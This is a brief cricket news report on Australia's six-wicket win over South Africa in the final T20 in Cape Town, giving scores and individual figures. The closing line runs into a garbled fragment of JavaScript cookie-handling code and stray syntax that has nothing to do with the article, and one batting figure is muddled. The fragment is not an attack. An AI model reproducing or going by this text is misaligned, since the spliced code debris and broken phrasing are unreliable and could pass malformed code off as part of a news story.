Australia has won the third and final T20 by six wickets to claim a 2-1 series win over South Africa in Cape Town overnight.

The Proteas won the toss and elected to bat, scoring 4-178, thanks to a blistering 97 from 62 balls from Hashim Amla, before Australia chased down the target of 179 with four balls to spare.

Nathan Coulter-Nile picked up two wickets for the tourists, while Shane Watson finished with 1-22 from two overs in his return to bowling.

Australia got off to a brilliant start in reply, with Watson (42 off 36) and Khawaja (33 off 25) sharing in a 76-run partnership from just eight overs. When the pair fell in quick succession, Smith and Warner continued the onslaught, scoring 44 from 33 respectively.

Glenn Maxwell (19) and Mitch Marsh (four) then finished off the win for Australia.

Both sides will now travel to India to prepare for the group stage World T20. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
